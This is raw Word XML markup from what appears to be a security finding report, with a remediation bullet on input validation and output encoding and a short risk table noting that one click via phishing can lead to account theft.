    <w:p w14:paraId="7DB74068" w14:textId="6C40AD94" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Validate/allow</w:t>
      </w:r>
      <w:r w:rsidR="005D362D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>list input format where practical, in addition to (not instead of) output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2EE0FF" w14:textId="7162286C" w:rsidR="0030171F" w:rsidRDefault="005E3040">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t>. 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4189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC6BB2" w14:paraId="58F6B6C9" w14:textId="77777777" w:rsidTr="00EC6BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1746" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4128D0EC" w14:textId="72617A05" w:rsidR="00EC6BB2" w:rsidRPr="00466ACD" w:rsidRDefault="00EC6BB2">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466ACD">
              <w:rPr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4189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7EA7C3" w14:textId="244E2ED4" w:rsidR="00EC6BB2" w:rsidRPr="00466ACD" w:rsidRDefault="00EC6BB2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466ACD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EC6BB2" w14:paraId="76DDBB6B" w14:textId="0A07D381" w:rsidTr="00EC6BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1746" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78EEC88C" w14:textId="182CF6D1" w:rsidR="00EC6BB2" w:rsidRPr="00466ACD" w:rsidRDefault="00EC6BB2">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466ACD">
              <w:rPr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189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6949B6AE" w14:textId="493EA9A4" w:rsidR="00EC6BB2" w:rsidRDefault="00EC6BB2">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Needs user to click a link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6BB2" w14:paraId="0EA089D8" w14:textId="4BF2219A" w:rsidTr="00EC6BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1746" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="336BE831" w14:textId="5AC1D31C" w:rsidR="00EC6BB2" w:rsidRPr="00466ACD" w:rsidRDefault="00EC6BB2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466ACD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22FFFC78" w14:textId="1F69D767" w:rsidR="00EC6BB2" w:rsidRDefault="00EC6BB2">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Needs phishing/Social Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6BB2" w14:paraId="445A01CC" w14:textId="5185542B" w:rsidTr="00EC6BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1746" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD4EAE0" w14:textId="2411B19D" w:rsidR="00EC6BB2" w:rsidRPr="00466ACD" w:rsidRDefault="00EC6BB2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466ACD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Risk to Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02FAE7E4" w14:textId="08DA37FA" w:rsidR="00EC6BB2" w:rsidRDefault="00EC6BB2">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>1 click = account stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="737A835B" w14:textId="3CFADA24" w:rsidR="0030171F" w:rsidRDefault="0030171F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003017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11FEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10CE11B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71F"/>
    <w:rsid w:val="002318C2"/>
    <w:rsid w:val="00235626"/>
    <w:rsid w:val="0030171F"/>
    <w:rsid w:val="00466ACD"/>
    <w:rsid w:val="00475A35"/>
    <w:rsid w:val="004E1AA1"/>
    <w:rsid w:val="00546468"/>
    <w:rsid w:val="005D362D"/>
    <w:rsid w:val="005E3040"/>
    <w:rsid w:val="007D3CA4"/>
    <w:rsid w:val="00845318"/>
    <w:rsid w:val="00847747"/>
    <w:rsid w:val="00AF5178"/>
    <w:rsid w:val="00B033BD"/>
    <w:rsid w:val="00BD66B9"/>
    <w:rsid w:val="00D42BE2"/>
    <w:rsid w:val="00DB37FE"/>
    <w:rsid w:val="00DF42B7"/>
    <w:rsid w:val="00E66A0B"/>
    <w:rsid w:val="00EC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0B0E"/>
  <w15:docId w15:val="{04115C5A-D870-403B-85FB-9FDE92DB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6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#KPN</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-16T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-16T22:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>